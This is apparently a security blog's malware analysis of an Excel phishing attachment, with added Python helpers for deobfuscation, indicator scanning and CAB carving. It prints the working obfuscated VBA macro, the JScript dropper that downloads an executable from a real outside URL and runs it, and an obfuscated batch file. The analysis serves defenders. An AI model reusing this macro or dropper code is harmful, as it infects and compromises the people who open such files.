Month: March 2016

A case of a sadistic Excel file Pt. 1


Yesterday we received an email with the subject “CASH DEPOSIT – 3-1-2016” and an Excel file attached. Our infrastructure blocked it as an Excel file with macros and download-and-execute capabilities. This Excel file had a characteristic that I had not seen before (in my brief experience with malware): parts of the macro code call VBScript code that is stored as actual cell values. So let's start… (cheers @aner for his support)

As always with Office files, Didier Stevens' wonderful and always useful tool oledump is needed in order to analyze the structure of the file.

python oledump.py f90f80371ce8c0fd632b9a10d18ac136
  1:       102 '\x01CompObj'
  2:       352 '\x05DocumentSummaryInformation'
  3:       184 '\x05SummaryInformation'
  4:    182391 'Workbook'
  5:       720 '_VBA_PROJECT_CUR/PROJECT'
  6:       107 '_VBA_PROJECT_CUR/PROJECTwm'
  7: M    1540 '_VBA_PROJECT_CUR/VBA/Module1'
  8:      3838 '_VBA_PROJECT_CUR/VBA/_VBA_PROJECT'
  9:      1497 '_VBA_PROJECT_CUR/VBA/__SRP_0'
 10:       151 '_VBA_PROJECT_CUR/VBA/__SRP_1'
 11:        94 '_VBA_PROJECT_CUR/VBA/__SRP_2'
 12:       185 '_VBA_PROJECT_CUR/VBA/__SRP_3'
 13:       853 '_VBA_PROJECT_CUR/VBA/dir'
 14: m     976 '_VBA_PROJECT_CUR/VBA/\xd0\x9b\xd0\xb8\xd1\x81\xd1\x821'
 15: m     976 '_VBA_PROJECT_CUR/VBA/\xd0\x9b\xd0\xb8\xd1\x81\xd1\x822'
 16: m     976 '_VBA_PROJECT_CUR/VBA/\xd0\x9b\xd0\xb8\xd1\x81\xd1\x823'
 17: M    3528 '_VBA_PROJECT_CUR/VBA/\xd0\xad\xd1\x82\xd0\xb0\xd0\x9a\xd0\xbd\xd0\xb8\xd0\xb3\xd0\xb0'

As you can see, the streams marked with a capital M are the ones that contain macro code (a lowercase m marks a macro stream that holds only attributes and no code), and they are the ones we should always begin with. The stream names are Russian: streams 14 to 16 are Лист1 to Лист3 (Sheet1 to Sheet3) and stream 17 is ЭтаКнига (ThisWorkbook). Below is the macro code of the two M streams, 7 and 17.

Attribute VB_Name = "Module1"
Function ShW(ByVal ptrWSH, ByVal ptrStart, ByVal bWt)
Set yuwifdskjf = CreateObject("WS" & StrReverse("tpirc") & ".Sh" & StrReverse("lle"))
yuwifdskjf.Run ptrStart
End Function

Function rywiiowjx(ByVal ueiuwi, ByVal pimchw)
ueiuwi.SaveToFile pimchw, 2
End Function

Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
OnClick
End Sub

Sub OnClick()
On Error Resume Next

If ActiveSheet.Name = "Tot" & "al" Then Exit Sub

Dim vlB3
vlB3 = Worksheets("Cod" & "e").Range("B" & "3").Value

Dim kgfdad
kgfdad = StrReverse(".BDODA")
kgfdad = kgfdad & "St" & Mid(ActiveSheet.Name, 3, 1) & "e" & Mid(ActiveSheet.Name, 2, 1) & "m"

Set ewytufhd = CreateObject(kgfdad)

ewytufhd.Mode = 3
ewytufhd.Type = 2
ewytufhd.Open

Dim scrWS
scrWS = "wsc" & Mid(ActiveSheet.Name, 3, 1) & Mid(ActiveSheet.Name, 5, 1) & "pt." & Worksheets("Cod" & "e").Range("A" & "1").Value
Dim ptsBuf
ptsBuf = "%" & StrReverse("PMT") & "%"
ptsBuf = ptsBuf & "\srteam" & StrReverse("sj.")

'==================================================
Dim llSW
Set llSW = CreateObject(scrWS)
Dim tprSC
ptsBuf = llSW.ExpandEnvironmentStrings(ptsBuf)

tprSC = StrReverse("csw") & Mid(ActiveSheet.Name, 3, 1) & Mid("kipt", 2)

ewytufhd.WriteText vlB3

Application.Run "rywiiowjx", ewytufhd, ptsBuf
Application.Run "ShW", llSW, tprSC & " " & ptsBuf, True

Set MainSheet = Application.ThisWorkbook.Sheets("To" & "tal")
Set StartSheet = Application.ThisWorkbook.Sheets("War" & "ning")
MainSheet.Visible = True
StartSheet.Visible = xlVeryHide

ActiveWorkbook.Save

End Sub


So the first thing executed when the document opens is the Workbook_Open handler in ЭтаКнига (ThisWorkbook), which immediately calls the OnClick method. As you can see there are a lot of reversed strings. The surprising thing for me is that there are direct references to values of the document (instead of data streams), such as the name of the ActiveSheet and the values of cells A1 and B3; I usually see such values inside streams of the document.

It would be easy to just open the Excel file in a sandbox and extract the referenced data. I chose another approach: with the Python library xlrd it is possible to parse the Excel file and get the information we need. Here is a small Python script that does exactly that.

import xlrd

workbook = xlrd.open_workbook("excel")        # path of the sample .xls
worksheet = workbook.sheet_by_name('Code')
b_3 = worksheet.cell(2, 1).value               # B3 (0-based row 2, column 1): the script payload
a_1 = worksheet.cell(0, 0).value               # A1 equals the word Shell
for i, s in enumerate(workbook.sheets()):
    print(i, s.name, s.sheet_selected, s.sheet_visible)

# output of the enumeration of the worksheets (index, name, selected, visible):
(0, u'Warning', 1, 1)
(1, u'Total', 0, 0)
(2, u'Code', 0, 0)

So the macro creates a file at %TMP%\srteam.js (the ptsBuf variable, after ExpandEnvironmentStrings) and stores in it the contents of cell B3 (described below), using the rywiiowjx function from stream 7, which calls SaveToFile on the stream object. The kgfdad variable is “ADODB.Stream”: the macro takes the characters at positions 3 and 2 of the active sheet name “Warning”, which are r and a respectively (positions start from 1, not 0, when using the Mid function). The scrWS string is of course “wscript.Shell”, and tprSC, built the same way, is “wscript”. In both cases these strings are COM ProgIDs used to write and then execute the JS script. Function ShW from stream 7 executes srteam.js through the Run method; the string built in that function is “WScript.Shell”.
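To check the string reconstruction above without opening the workbook, here is an added Python example (my own code, not the post's) that emulates the VBA StrReverse and 1-based Mid functions and rebuilds every obfuscated string of OnClick and ShW from the two inputs the macro reads from the document: the active sheet name and the value of Code!A1. The two input values ("Warning" and "Shell") are the ones the xlrd script recovered.

```python
from typing import Optional

# Added example: Python emulation of the VBA string building in the OnClick
# macro, so the ProgIDs and the drop path can be confirmed from the document
# values alone (no need to execute the workbook).


def str_reverse(s: str) -> str:
    """VBA StrReverse."""
    return s[::-1]


def mid(s: str, start: int, length: Optional[int] = None) -> str:
    """VBA Mid(): start is 1-based; with no length it runs to the end of the string."""
    if start < 1:
        raise ValueError("VBA Mid() positions start at 1, not 0")
    i = start - 1
    return s[i:] if length is None else s[i:i + length]


def resolve_onclick_strings(active_sheet_name: str, code_a1: str) -> dict:
    """Rebuild the obfuscated strings of OnClick/ShW from the sheet name that is
    active on open and the value of cell A1 of the 'Code' sheet."""
    name = active_sheet_name
    # kgfdad = StrReverse(".BDODA") & "St" & Mid(name, 3, 1) & "e" & Mid(name, 2, 1) & "m"
    kgfdad = str_reverse(".BDODA") + "St" + mid(name, 3, 1) + "e" + mid(name, 2, 1) + "m"
    # scrWS = "wsc" & Mid(name, 3, 1) & Mid(name, 5, 1) & "pt." & Code!A1
    scr_ws = "wsc" + mid(name, 3, 1) + mid(name, 5, 1) + "pt." + code_a1
    # ptsBuf = "%" & StrReverse("PMT") & "%" & "\srteam" & StrReverse("sj.")
    pts_buf = "%" + str_reverse("PMT") + "%" + "\\srteam" + str_reverse("sj.")
    # tprSC = StrReverse("csw") & Mid(name, 3, 1) & Mid("kipt", 2)
    tpr_sc = str_reverse("csw") + mid(name, 3, 1) + mid("kipt", 2)
    # Module1.ShW: CreateObject("WS" & StrReverse("tpirc") & ".Sh" & StrReverse("lle"))
    shw_progid = "WS" + str_reverse("tpirc") + ".Sh" + str_reverse("lle")
    return {
        # If ActiveSheet.Name = "Tot" & "al" Then Exit Sub
        "runs_on_open": name != "Tot" + "al",
        "kgfdad": kgfdad,
        "scrWS": scr_ws,
        "ptsBuf": pts_buf,
        "tprSC": tpr_sc,
        "ShW_progid": shw_progid,
        # what ShW passes to WScript.Shell.Run (ptsBuf is env-expanded first in the macro)
        "command_line": tpr_sc + " " + pts_buf,
    }


if __name__ == "__main__":
    # Sheet "Warning" is selected/visible on open and Code!A1 holds "Shell" (from xlrd).
    for key, value in resolve_onclick_strings("Warning", "Shell").items():
        print(f"{key:13} {value}")
```

Running it with the sheet named "Total" active shows why the macro exits early on the second open: the workbook saves itself with "Total" visible after the first run, so OnClick does nothing the next time.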

So let's see the contents of cell B3, which will be executed.

(function (Global){

function CreateObject(ProgId)
{
return new ActiveXObject(ProgId);
}

var FSO = fso = CreateObject("Scripting.FileSystemObject");
var WshShell = CreateObject("WScript.Shell");

function tmp()
{
var uyeifds = new ActiveXObject("Shell.Application");
return uyeifds;
}

var dwl2="p://";

function isFile(Path)
{
Path = WshShell.ExpandEnvironmentStrings(Path);
return fso.FileExists(Path);
}

function shl(rto)
{
tmp().ShellExecute(rto,"","","open","0");
}

function DeleteFile(Path)
{
if (/Array/i.test(Path.constructor+""))
{
for (var i=0, l=Path.length;i<l;i++)
DeleteFile(Path[i]);
return;
}

Path = WshShell.ExpandEnvironmentStrings(Path);
try
{
if (isFile(Path))
FSO.GetFile(Path).Delete(true);
} catch (e) {}
}

function DownloadFileFromURL(Url, FileDest)
{
var msx = "Msxml2";
if (!FileDest || !Url) return null;

var ge = "GE";

FileDest = WshShell.ExpandEnvironmentStrings(FileDest);
msx = msx + ".XMLHTTP";
DeleteFile(FileDest);
var oXMLHTTP = WScript.CreateObject(msx);
oXMLHTTP.open (ge + "T", Url, false);
oXMLHTTP.send(null);
var oADOStream = CreateObject("ADO" + "DB.Stream");
with (oADOStream){
Mode = 3;
Type = 1;
Open()
Write (oXMLHTTP.responseBody);
SaveToFile(FileDest, 2);
Close();
return FileDest;
}
}

var tor1="%APPDATA%\\run.e";
var tor2="xe";

try
{
FSO.GetFile("\\\\WORKOUTD\\..hj");
} catch (e)
{

var Url="http://s2.zalivalka.ru/download/342557/554332.jpg";
DownloadFileFromURL(Url,tor1+tor2);

shl(WshShell.ExpandEnvironmentStrings(tor1+tor2));
}
})(this)


The JavaScript is fairly straightforward. The whole script is an anonymous function that is invoked immediately (with this passed in as Global), so its body runs as soon as wscript loads the file. It first tries FSO.GetFile on \\WORKOUTD\..hj and only in the catch block, i.e. when that path cannot be found, downloads the file http://s2.zalivalka.ru/download/342557/554332.jpg, stores it in %APPDATA%\run.exe and then executes it. If anyone has an idea what the meaning of \\WORKOUTD\..hj is, please let me know.
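Since the script splits its ProgIDs across string literals and variables, here is an added Python example (my own code, not the post's) of how a defender can statically triage such a dropped .js file: fold adjacent string literals first, so that "ADO" + "DB.Stream" becomes "ADODB.Stream", then match a list of download-and-execute primitives. The indicator list is mine, and the embedded sample script is a constructed excerpt modelled on the payload above with a placeholder URL.

```python
import re

# Added example: static triage of a dropped script (srteam.js style).
# Download-and-execute primitives used by the script in the post; list is my own.
INDICATORS = (
    "ActiveXObject", "Scripting.FileSystemObject", "WScript.Shell",
    "Shell.Application", "XMLHTTP", "ADODB.Stream", "responseBody",
    "SaveToFile", "ShellExecute", "ExpandEnvironmentStrings",
)

_CONCAT = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')   # "a" + "b"
_URL = re.compile(r'https?://[^\s"\']+')


def fold_literal_concats(src: str) -> str:
    """Join adjacent string literals until nothing changes: "a" + "b" + "c" -> "abc".
    Only literal-literal pairs are folded; concatenation through variables
    (msx + ".XMLHTTP" in the post's script) is left as is."""
    prev = None
    while prev != src:
        prev = src
        src = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
    return src


def triage(src: str) -> dict:
    """Report which primitives and URLs a script contains after literal folding."""
    folded = fold_literal_concats(src)
    found = [ind for ind in INDICATORS if ind in folded]
    fetch = any(i in found for i in ("XMLHTTP", "responseBody"))
    write = "SaveToFile" in found
    launch = re.search(r"ShellExecute|\.Run\b", folded) is not None
    return {
        "indicators": found,
        "urls": _URL.findall(folded),
        # fetch + write to disk + launch in one script is the "Download & Execute"
        # pattern the post's mail infrastructure flagged
        "download_and_execute": fetch and write and launch,
    }


# Constructed sample: lines modelled on the srteam.js payload, placeholder URL.
SAMPLE_JS = r'''
function CreateObject(ProgId) { return new ActiveXObject(ProgId); }
var FSO = fso = CreateObject("Scripting.FileSystemObject");
var WshShell = CreateObject("WScript.Shell");
var msx = "Msxml2";
msx = msx + ".XMLHTTP";
var oXMLHTTP = WScript.CreateObject(msx);
var oADOStream = CreateObject("ADO" + "DB.Stream");
oADOStream.Write(oXMLHTTP.responseBody);
oADOStream.SaveToFile(FileDest, 2);
tmp().ShellExecute(rto, "", "", "open", "0");
var Url = "http://example.invalid/payload.jpg";
'''

if __name__ == "__main__":
    for key, value in triage(SAMPLE_JS).items():
        print(f"{key:21} {value}")
```

Note that the full ProgID "Msxml2.XMLHTTP" never appears in the folded text because the script assembles it through a variable; matching on the distinctive fragment "XMLHTTP" is what keeps the chain detectable, and the same applies to the "%APPDATA%\run.e" + "xe" path, which is why the URL and the split path are reported separately.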

Now let's analyze the downloaded file. We will use NtCore's CFF Explorer, a great free tool that offers full functionality for static analysis of PE files.

[Image: Capture1]

It seems that the original file name is wextract.exe, so we can guess that this file is a self-extracting executable created with IExpress; wextract.exe is the self-extraction stub.

[Image: Capture2]

There is a resource called CABINET which contains a .cab file (MSCF header). We can extract the .cab file and open it with any archive tool that handles CAB. The contents of the CAB file are the following:

  • poi.exe
  • 1.bat

There is also another resource, RUNPROGRAM, which contains the name of the file that will be executed after the self-extraction process is completed. RUNPROGRAM contains the value 1.bat, so this is the first file that will be executed.
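The CABINET resource can also be carved and listed without a GUI tool. The following added Python example (my own code, not the post's or CFF Explorer's) finds the MSCF signature inside a resource blob, slices out the cabinet using the cbCabinet field of its CFHEADER and walks the CFFILE entries to list the contained file names, following the Microsoft Cabinet format layout (CFHEADER, CFFOLDER, CFFILE). The resource blob it runs on is a constructed fixture with the two file names from above; it carries no CFDATA blocks, so it is enough for the header walk but is not an extractable archive.

```python
import struct

# Added example: carve a cabinet out of a PE resource blob and list its files.
CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")   # 36 bytes
CFFOLDER = struct.Struct("<IHH")               # 8 bytes: coffCabStart, cCFData, typeCompress
CFFILE = struct.Struct("<IIHHHH")              # 16 bytes, followed by a NUL-terminated szName
A_NAME_IS_UTF = 0x80                            # CFFILE.attribs bit: szName is UTF-8


def find_mscf(blob: bytes) -> int:
    """Offset of the first 'MSCF' signature in the blob, or -1."""
    return blob.find(b"MSCF")


def carve_cab(blob: bytes) -> bytes:
    """Slice the cabinet out of a larger blob using cbCabinet from its header."""
    off = find_mscf(blob)
    if off < 0:
        raise ValueError("no MSCF signature in blob")
    cb_cabinet = CFHEADER.unpack_from(blob, off)[2]
    if off + cb_cabinet > len(blob):
        raise ValueError("cbCabinet runs past the end of the blob (truncated resource?)")
    return blob[off:off + cb_cabinet]


def list_cab_files(cab: bytes):
    """Return [(name, size)] for every CFFILE entry of a cabinet."""
    (sig, _res1, _cb_cabinet, _res2, coff_files, _res3, _ver_minor, _ver_major,
     _c_folders, c_files, _flags, _set_id, _i_cabinet) = CFHEADER.unpack_from(cab, 0)
    if sig != b"MSCF":
        raise ValueError("not a cabinet")
    pos = coff_files          # absolute offset of the first CFFILE; folders need not be walked
    entries = []
    for _ in range(c_files):
        cb_file, _uoff, _i_folder, _date, _time, attribs = CFFILE.unpack_from(cab, pos)
        pos += CFFILE.size
        end = cab.index(b"\x00", pos)
        encoding = "utf-8" if attribs & A_NAME_IS_UTF else "cp1252"
        entries.append((cab[pos:end].decode(encoding), cb_file))
        pos = end + 1
    return entries


def build_sample_cab(files):
    """Constructed fixture: single-folder cabinet with CFFILE entries and no CFDATA."""
    folder = CFFOLDER.pack(0, 0, 0)             # typeCompress 0 = none
    body, uoff = b"", 0
    for name, size in files:
        body += CFFILE.pack(size, uoff, 0, 0, 0, 0x20) + name.encode("ascii") + b"\x00"
        uoff += size
    coff_files = CFHEADER.size + len(folder)
    total = coff_files + len(body)
    header = CFHEADER.pack(b"MSCF", 0, total, 0, coff_files, 0,
                           3, 1, 1, len(files), 0, 0, 0)
    return header + folder + body


if __name__ == "__main__":
    # Constructed stand-in for the CABINET resource: padding, cabinet, trailing bytes.
    resource = b"\x00" * 16 + build_sample_cab([("poi.exe", 123456), ("1.bat", 4096)]) + b"\xff" * 8
    for name, size in list_cab_files(carve_cab(resource)):
        print(f"{name:12} {size} bytes")
```

On a real sample you would pass the bytes of the CABINET resource (or the whole wextract.exe, since find_mscf scans the blob) and write the result of carve_cab to a .cab file for extraction.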

As the last part of this post we will analyze the .bat file.


set uFxIfBjU=set
%uFxIfBjU% vmQRH=
%uFxIfBjU%%vmQRH%WlvwJ==
%uFxIfBjU%%vmQRH%niGHQ%WlvwJ%]
%uFxIfBjU%%vmQRH%gvNJihit%WlvwJ%M
%uFxIfBjU%%vmQRH%ubLLkCr%WlvwJ%L
%uFxIfBjU%%vmQRH%wYYyQIxk%WlvwJ%z
%uFxIfBjU%%vmQRH%WbawMPRLx%WlvwJ%l
%uFxIfBjU%%vmQRH%XwaRdC%WlvwJ%;
%uFxIfBjU%%vmQRH%SMfIu%WlvwJ%$
%uFxIfBjU%%vmQRH%JekiXWpq%WlvwJ%@
%uFxIfBjU%%vmQRH%mtoldyH%WlvwJ%9
%uFxIfBjU%%vmQRH%QffPfCDl%WlvwJ%_
%uFxIfBjU%%vmQRH%smzXUe%WlvwJ%(
%uFxIfBjU%%vmQRH%gJCt%WlvwJ%a
%uFxIfBjU%%vmQRH%CtvQzOlc%WlvwJ%D
%uFxIfBjU%%vmQRH%tKApd%WlvwJ%I
%uFxIfBjU%%vmQRH%GFNL%WlvwJ%S
%uFxIfBjU%%vmQRH%TaMgC%WlvwJ%F
%uFxIfBjU%%vmQRH%eYdGvjqA%WlvwJ%r
%uFxIfBjU%%vmQRH%kAJtQCe%WlvwJ%1
%uFxIfBjU%%vmQRH%CbrzJAoLY%WlvwJ%?
%uFxIfBjU%%vmQRH%MfcJVJhRo%WlvwJ%c
%uFxIfBjU%%vmQRH%KppMzH%WlvwJ%#
%uFxIfBjU%%vmQRH%CbeOdG%WlvwJ%T
%uFxIfBjU%%vmQRH%wkUfYM%WlvwJ%y
%uFxIfBjU%%vmQRH%qCCY%WlvwJ%C
%uFxIfBjU%%vmQRH%IeqoAr%WlvwJ%b
%uFxIfBjU%%vmQRH%zMUmhfp%WlvwJ%n
%uFxIfBjU%%vmQRH%VgoKTyH%WlvwJ%2
%uFxIfBjU%%vmQRH%IAiBMhM%WlvwJ%O
%uFxIfBjU%%vmQRH%AaWV%WlvwJ%:
%uFxIfBjU%%vmQRH%lCRh%WlvwJ%N
%uFxIfBjU%%vmQRH%VzRqFhIQ%WlvwJ%k
%uFxIfBjU%%vmQRH%UKYKKJt%WlvwJ%K
%uFxIfBjU%%vmQRH%NnRB%WlvwJ%3
%uFxIfBjU%%vmQRH%INirbsqG%WlvwJ%)
%uFxIfBjU%%vmQRH%wiPSW%WlvwJ%m
%uFxIfBjU%%vmQRH%qFclxaIHP%WlvwJ%.
%uFxIfBjU%%vmQRH%GhcPmRW%WlvwJ%*
%uFxIfBjU%%vmQRH%wJnFYm%WlvwJ%5
%uFxIfBjU%%vmQRH%zMgQwFM%WlvwJ%Y
%uFxIfBjU%%vmQRH%jCwDE%WlvwJ%q
%uFxIfBjU%%vmQRH%gPgacqpE%WlvwJ%!
%uFxIfBjU%%vmQRH%nKFutdce%WlvwJ%u
%uFxIfBjU%%vmQRH%GhGCV%WlvwJ%U
%uFxIfBjU%%vmQRH%VKdC%WlvwJ%t
%uFxIfBjU%%vmQRH%eEgBdYwt%WlvwJ%8
%uFxIfBjU%%vmQRH%xjXo%WlvwJ%B
%uFxIfBjU%%vmQRH%Tpcr%WlvwJ%H
%uFxIfBjU%%vmQRH%uDysBInSP%WlvwJ%E
%uFxIfBjU%%vmQRH%flSTw%WlvwJ%g
%uFxIfBjU%%vmQRH%vOjmHX%WlvwJ%P
%uFxIfBjU%%vmQRH%cJDeAFxaa%WlvwJ%v
%uFxIfBjU%%vmQRH%IDRnURC%WlvwJ%e
%uFxIfBjU%%vmQRH%rvKdv%WlvwJ%w
%uFxIfBjU%%vmQRH%YAXUzT%WlvwJ%R
%uFxIfBjU%%vmQRH%tRuE%WlvwJ%6
%uFxIfBjU%%vmQRH%nhRt%WlvwJ%0
%uFxIfBjU%%vmQRH%VVoOFw%WlvwJ%o
%uFxIfBjU%%vmQRH%iHXWWADYK%WlvwJ%X
%uFxIfBjU%%vmQRH%ryFCAi%WlvwJ%A
%uFxIfBjU%%vmQRH%rUFWQUVKk%WlvwJ%h
%uFxIfBjU%%vmQRH%YDOQcd%WlvwJ%i
%uFxIfBjU%%vmQRH%FvSVze%WlvwJ%s
%uFxIfBjU%%vmQRH%oAbh%WlvwJ%/
%uFxIfBjU%%vmQRH%tlGA%WlvwJ%+
%uFxIfBjU%%vmQRH%AhgUCQdNc%WlvwJ%x
%uFxIfBjU%%vmQRH%hbveWdig%WlvwJ%G
%uFxIfBjU%%vmQRH%sRQuCQHsB%WlvwJ%j
%uFxIfBjU%%vmQRH%jFbR%WlvwJ%[
%uFxIfBjU%%vmQRH%lITdx%WlvwJ%d
%uFxIfBjU%%vmQRH%VkONb%WlvwJ%7
%uFxIfBjU%%vmQRH%DcNlaOG%WlvwJ%{
%uFxIfBjU%%vmQRH%Dkyl%WlvwJ%V
%uFxIfBjU%%vmQRH%gxmBTj%WlvwJ%Q
%uFxIfBjU%%vmQRH%bJiooe%WlvwJ%"
%uFxIfBjU%%vmQRH%udasU%WlvwJ%\
%uFxIfBjU%%vmQRH%UkAijhn%WlvwJ%4
%uFxIfBjU%%vmQRH%DfIJfWaO%WlvwJ%W
%uFxIfBjU%%vmQRH%uHNRtTBo%WlvwJ%-
%uFxIfBjU%%vmQRH%sRaTV%WlvwJ%p
%uFxIfBjU%%vmQRH%sdbGC%WlvwJ%f
%uFxIfBjU%%vmQRH%fVqiK%WlvwJ%,
%uFxIfBjU%%vmQRH%mLjd%WlvwJ%}
%uFxIfBjU%%vmQRH%SAXwnTEq%WlvwJ%Z
%uFxIfBjU%%vmQRH%XyTlyKEg%WlvwJ%J
%JekiXWpq%%uDysBInSP%%MfcJVJhRo%%rUFWQUVKk%%VVoOFw%%vmQRH%%IAiBMhM%%sdbGC%%sdbGC%
%sRaTV%%YDOQcd%%zMUmhfp%%flSTw%%vmQRH%%uHNRtTBo%%zMUmhfp%%vmQRH%%VgoKTyH%%vmQRH%%flSTw%%VVoOFw%%VVoOFw%%flSTw%%WbawMPRLx%%IDRnURC%%qFclxaIHP%%MfcJVJhRo%%VVoOFw%%wiPSW%|%TaMgC%%YDOQcd%%zMUmhfp%%lITdx%%vmQRH%%oAbh%%tKApd%%vmQRH%%bJiooe%%CbeOdG%%CbeOdG%%ubLLkCr%%WlvwJ%%bJiooe%||%flSTw%%VVoOFw%%VKdC%%VVoOFw%%vmQRH%%zMUmhfp%%IDRnURC%%AhgUCQdNc%%VKdC%%vmQRH%
%VKdC%%gJCt%%FvSVze%%VzRqFhIQ%%VzRqFhIQ%%YDOQcd%%WbawMPRLx%%WbawMPRLx%%vmQRH%%oAbh%%sdbGC%%vmQRH%%oAbh%%YDOQcd%%wiPSW%%vmQRH%%MfcJVJhRo%%VKdC%%sdbGC%%wiPSW%%VVoOFw%%zMUmhfp%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%VKdC%%gJCt%%FvSVze%%VzRqFhIQ%%VzRqFhIQ%%YDOQcd%%WbawMPRLx%%WbawMPRLx%%vmQRH%%oAbh%%sdbGC%%vmQRH%%oAbh%%YDOQcd%%wiPSW%%vmQRH%%MfcJVJhRo%%VKdC%%sdbGC%%wiPSW%%VVoOFw%%zMUmhfp%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%VKdC%%gJCt%%FvSVze%%VzRqFhIQ%%VzRqFhIQ%%YDOQcd%%WbawMPRLx%%WbawMPRLx%%vmQRH%%oAbh%%sdbGC%%vmQRH%%oAbh%%YDOQcd%%wiPSW%%vmQRH%%MfcJVJhRo%%VKdC%%sdbGC%%wiPSW%%VVoOFw%%zMUmhfp%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%VKdC%%gJCt%%FvSVze%%VzRqFhIQ%%VzRqFhIQ%%YDOQcd%%WbawMPRLx%%WbawMPRLx%%vmQRH%%oAbh%%sdbGC%%vmQRH%%oAbh%%YDOQcd%%wiPSW%%vmQRH%%MfcJVJhRo%%VKdC%%sdbGC%%wiPSW%%VVoOFw%%zMUmhfp%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%VKdC%%gJCt%%FvSVze%%VzRqFhIQ%%VzRqFhIQ%%YDOQcd%%WbawMPRLx%%WbawMPRLx%%vmQRH%%oAbh%%sdbGC%%vmQRH%%oAbh%%YDOQcd%%wiPSW%%vmQRH%%MfcJVJhRo%%VKdC%%sdbGC%%wiPSW%%VVoOFw%%zMUmhfp%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%VKdC%%gJCt%%FvSVze%%VzRqFhIQ%%VzRqFhIQ%%YDOQcd%%WbawMPRLx%%WbawMPRLx%%vmQRH%%oAbh%%sdbGC%%vmQRH%%oAbh%%YDOQcd%%wiPSW%%vmQRH%%MfcJVJhRo%%VKdC%%sdbGC%%wiPSW%%VVoOFw%%zMUmhfp%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%VKdC%%gJCt%%FvSVze%%VzRqFhIQ%%VzRqFhIQ%%YDOQcd%%WbawMPRLx%%WbawMPRLx%%vmQRH%%oAbh%%sdbGC%%vmQRH%%oAbh%%YDOQcd%%wiPSW%%vmQRH%%MfcJVJhRo%%VKdC%%sdbGC%%wiPSW%%VVoOFw%%zMUmhfp%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%%vmQRH%%oAbh%%cJDeAFxaa%%IDRnURC%%eYdGvjqA%%wkUfYM%%FvSVze%%YDOQcd%%WbawMPRLx%%IDRnURC%%zMUmhfp%%VKdC%%vmQRH%%oAbh%%vOjmHX%%gJCt%%FvSVze%%FvSVze%%rvKdv%%VVoOFw%%eYdGvjqA%%lITdx%%WlvwJ%%NnRB%%UkAijhn%%wJnFYm%%UkAijhn%%tRuE%%wJnFYm%%kAJtQCe%%VgoKTyH%%VgoKTyH%%NnRB%%UkAijhn%%wJnFYm%
%sRaTV%%YDOQcd%%zMUmhfp%%flSTw%%vmQRH%%WbawMPRLx%%VVoOFw%%MfcJVJhRo%%gJCt%%WbawMPRLx%%rUFWQUVKk%%VVoOFw%%FvSVze%%VKdC%%vmQRH%%uHNRtTBo%%kAJtQCe%%nhRt%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%0%vmQRH%>%vmQRH%%zMUmhfp%%nKFutdce%%WbawMPRLx%
%flSTw%%VVoOFw%%VKdC%%VVoOFw%%vmQRH%%kAJtQCe%
:next
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
%lITdx%%IDRnURC%%WbawMPRLx%%vmQRH%%sRaTV%%VVoOFw%%YDOQcd%%qFclxaIHP%%IDRnURC%%AhgUCQdNc%%IDRnURC%
